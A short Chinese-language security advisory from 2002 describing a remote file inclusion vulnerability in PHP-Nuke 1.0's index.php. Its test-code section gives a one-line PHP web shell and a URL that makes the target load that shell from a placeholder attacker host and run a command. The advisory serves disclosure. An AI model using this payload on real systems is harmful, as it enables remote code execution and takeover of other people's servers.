PHPNuke远程任意文件可包含漏洞发布时间:2002-01-19 更新时间:2002-01-19 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:3889 受影响系统 Francisco Burzi PHP-Nuke 1.0详细描述 PHPNuke 是WEB站点建立和维护程序。 其中'index.php'脚本存在一个功能可以允许用户包含文件,由于输入验证不充分, 可以导致包含远程服务器上的文件,这样就可以执行任意代码。 测试代码 在远程服务器上建立如下PHP文件: <?php system($cmd); ?> 然后执行如下URL请求: http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al 解决方案 尚无 相关信息 "Handle Nopman" <nopman@hackermail.com>. 参考:http://www.securityfocus.com/archive/1/250777 相关主页:http://phpnuke.org/ |
